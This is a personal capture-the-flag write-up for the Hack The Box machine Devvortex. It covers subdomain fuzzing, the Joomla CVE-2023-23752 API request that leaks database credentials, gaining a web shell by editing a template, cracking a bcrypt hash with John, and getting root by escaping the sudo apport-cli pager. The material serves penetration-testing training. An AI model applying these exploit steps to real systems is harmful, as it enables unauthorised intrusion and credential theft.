Here is my notes on DEVVORTEX box from Hackthebox.
DEVVORTEX: 
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
devvortex.htb
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb'  --hl 7
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://devvortex.htb/
Total requests: 100000
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                    
=====================================================================
000000022:   200        501 L    1581 W     23221 Ch    "dev"    
dev.devvortex.htb - joomla site ! 
http://dev.devvortex.htb/robots.txt: 
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/   
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml - very interesting. 
<folder>administrator</folder>
<folder>api</folder>
<folder>cache</folder>
<folder>cli</folder>
<folder>components</folder>
<folder>images</folder>
<folder>includes</folder>
<folder>language</folder>
<folder>layouts</folder>
<folder>libraries</folder>
<folder>media</folder>
<folder>modules</folder>
<folder>plugins</folder>
<folder>templates</folder>
<folder>tmp</folder>
<file>htaccess.txt</file>
<file>web.config.txt</file>
<file>LICENSE.txt</file>
<file>README.txt</file>
<file>index.php</file>
/web.config.txt 
joomla version 4.2.6 Vulnerable to information disclosure exploit (CVE-2023-23752)
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
{"type":"application","id":"224","attributes":{"user":"lewis","id":224}},{"type":"application","id":"224","attributes":{"password":"[REDIRECTED]","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"sd4fg_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":
lewis:[REDIRECTED]
#Able to login lewis creds to joomla service. 
http://dev.devvortex.htb/api/index.php/v1/users?public=true
lewis = Super Users
-Able to modify template to gain a shell. 
#Make sure it's an adminstrator template one because the other one is locked. 
Web-Shell to User Shell !
https://exploit-notes.hdks.org/exploit/web/cms/joomla-cms-pentesting/
https://hackertarget.com/attacking-enumerating-joomla/
https://www.exploit-db.com/exploits/51334
https://vulncheck.com/blog/joomla-for-rce
Reverse shell on any CMS
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla
PRIV ESC: 
www-data -> logan: 
mysql: 
#With lewis creds. 
Users_Tables: 
logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M[REDIRECTED]
#Crack it with john the ripper. 
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDIRECTED]    (logan)     
1g 0:00:00:12 DONE (2023-12-13 12:56) 0.07733g/s 108.5p/s 108.5c/s 108.5C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
logan:[REDIRECTED]
SSH with logan creds = USER SHELL ! 
USER.TXT: [REDIRECTED]
logan -> root: 
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ 
Create a report then press v and !/bin/bash to gain a root shell ! 
sudo /usr/bin/apport-cli -f
What would you like to do? Your options are:
  S: Send report (89.8 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# 
https://github.com/diego-tella/CVE-2023-1326-PoC
root@devvortex:/home/logan# cd /root
root@devvortex:~# ls
root.txt
root@devvortex:~# cat root.txt
[REDIRECTED]
root@devvortex:~# 
ROOT.TXT: [REDIRECTED]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Thanks you for reading my note !
